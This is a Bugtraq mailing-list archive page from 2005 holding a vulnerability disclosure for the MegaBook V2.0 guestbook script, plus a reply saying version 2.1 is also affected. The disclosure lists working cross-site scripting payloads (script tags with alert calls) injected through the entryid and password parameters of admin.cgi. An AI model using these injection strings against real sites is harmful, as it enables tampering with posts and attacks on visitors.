Home page logo
/

bugtraq logo Bugtraq mailing list archives

Re: MegaBook V2.0 - Cross Site Scripting Exploit
From: Spy Hat <spyhat () spyhat com>
Date: 8 May 2005 12:06:01 -0000

In-Reply-To: <20050505104551.23441.qmail () www securityfocus com>

The same vulnerability also exist in the new version of MegaBook V2.1

Received: (qmail 6270 invoked from network); 5 May 2005 17:31:03 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
 by mail.securityfocus.com with SMTP; 5 May 2005 17:31:03 -0000
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
      by outgoing3.securityfocus.com (Postfix) with QMQP
      id 8A54C237664; Thu,  5 May 2005 09:22:24 -0600 (MDT)
Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq () securityfocus com>
List-Help: <mailto:bugtraq-help () securityfocus com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
Delivered-To: mailing list bugtraq () securityfocus com
Delivered-To: moderator for bugtraq () securityfocus com
Received: (qmail 20731 invoked from network); 5 May 2005 03:18:37 -0000
Date: 5 May 2005 10:45:51 -0000
Message-ID: <20050505104551.23441.qmail () www securityfocus com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: Spy Hat <spyhat () spyhat com>
To: bugtraq () securityfocus com
Subject: MegaBook V2.0 - Cross Site Scripting Exploit



The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the 
attacker to modify the post in the guestbook. The affected scripts is admin.cgi 

URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi) 

I have tested the script with the following query:

?action=modifypost&entryid=">&lt;script&gt;alert('wvs-xss-magic-string-703410097');&lt;/script&gt;

I have also tested the script with theses POST variables:

action=modifypost&entryid=66&password=&lt;script&gt;alert('wvs-xss-magic-string-188784308');&lt;/script&gt;

action=modifypost&entryid=66&password='>&lt;script&gt;alert('wvs-xss-magic-string-486624156');&lt;/script&gt;

action=modifypost&entryid=66&password=">&lt;script&gt;alert('wvs-xss-magic-string-1852691616');&lt;/script&gt;

action=modifypost&entryid=66&password=>&lt;script&gt;alert('wvs-xss-magic-string-429380114');&lt;/script&gt;

action=modifypost&entryid=66&password=</textarea>&lt;script&gt;alert('wvs-xss-magic-string-723975367');&lt;/script&gt;


Yours,
SpyHat



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]